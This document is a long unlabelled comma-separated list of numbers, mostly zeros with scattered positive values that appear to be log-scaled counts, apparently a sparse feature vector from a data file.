0.0, 0.0, 0.0, 0.0, 0.0, 6.287897844304593, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.772588722239781, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.6094379124341003, 0.0, 4.394449154672439, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.6094379124341003, 0, 0.0, 1.3862943611198906, 2.772588722239781, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 3.6375861597263857, 0, 0, 0.0, 0.0, 0.0, 0.0, 5.101797476893978, 0.0, 1.7412592803704001, 0.0, 0.0, 0.0, 0.0, 0.0, 2.1972245773362196, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 1.6094379124341003, 0.0, 0.0, 0, 2.3978952727983707, 0, 0.0, 0.0, 0.0, 2.4849066497880004, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 3.7612001156935624, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0, 1.3862943611198906, 0.0, 0, 0.0, 1.7412592803704001, 2.9957322735539913, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.791759469228055, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 6.198469360840316, 0.0, 2.550898738446989, 0, 0, 0.0, 0, 0.0, 3.4011973816621555, 0.0, 0, 0.0, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.6931471805599453, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.772588722239781, 0.0, 0.0, 0.0, 0.0, 3.5263605246161616, 0.0, 0.0, 3.58351893845611, 0, 0, 0.0, 0.0, 0.0, 3.6375861597263857, 0.0, 0.0, 0.0, 5.723585101952381, 0.0, 3.2188758248682006, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.6888794541139363, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.772588722239781, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 0, 1.3862943611198906, 0.0, 0, 0.0, 0.0, 0.0, 2.0794415416798357, 0, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 3.649511027115099, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.6109179126442243, 5.723585101952381, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.6375861597263857, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.295836866004329, 2.3978952727983707, 0, 0.0, 0.0, 0.0, 0.0, 2.550898738446989, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.5834963087817, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.9459101490553132, 0.0, 0, 0, 0.0, 0.0, 2.9957322735539913, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 3.6888794541139363, 0.0, 0.0, 2.1972245773362196, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 3.258096538021482, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 3.295836866004329, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 2.0794415416798357, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 3.258096538021482, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.5553480614894135, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 3.8918202981106265, 0, 0.0, 0.0, 0.0, 4.605170185988092, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 4.394449154672439, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.5649493574615367, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 1.6094379124341003, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.7412592803704001, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 2.550898738446989, 0, 0, 0, 12.266590935297321, 0.0, 0.0, 3.295836866004329, 0.0, 0.0, 0.0, 0, 0.0, 5.924066185063897, 0, 3.1354942159291497, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.1972245773362196, 0.0, 7.200951859620047, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 1.6094379124341003, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 4.06534854782536, 0, 0, 4.0943445622221, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 4.962844630259907, 0.0, 0.0, 0, 0, 2.1972245773362196, 0, 0.0, 0, 0.0, 0.0, 0, 0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 2.0794415416798357, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.7612001156935624, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.258096538021482, 0, 0, 0.0, 0.0, 0, 0.0, 3.8501476017100584, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0, 0, 0.0, 0.0, 1.0986122886681098, 2.1972245773362196, 0, 0.0, 0.0, 4.581130849408909, 0.0, 0, 2.5649493574615367, 0, 0.0, 0.0, 0, 0.0, 0.0, 2.772588722239781, 0.0, 0.0, 0.0, 0.0, 2.8398715690385097, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 3.6375861597263857, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 3.0910424533583156, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 1.6094379124341003, 0.0, 0.0, 0.0, 1.6094379124341003, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 2.3978952727983707, 0.0, 0.0, 0.0, 0.0, 0.0, 3.5553480614894135, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.791759469228055, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.0841946160253872, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.723585101952381, 0.0, 0.0, 8.921925063191328, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 1.7412592803704001, 0.0, 0.0, 0.0, 2.0794415416798357, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.302585092994046, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 5.101797476893978, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.9444389791664403, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 2.9957322735539913, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.7412592803704001, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 3.367295829986474, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 4.605170185988092, 0.0, 0, 0.0, 10.39720770839918, 2.302585092994046, 2.5649493574615367, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.044522437723423, 0.0, 2.9957322735539913, 0, 0, 4.06534854782536, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 3.295836866004329, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.1354942159291497, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 3.2188758248682006, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 5.723585101952381, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 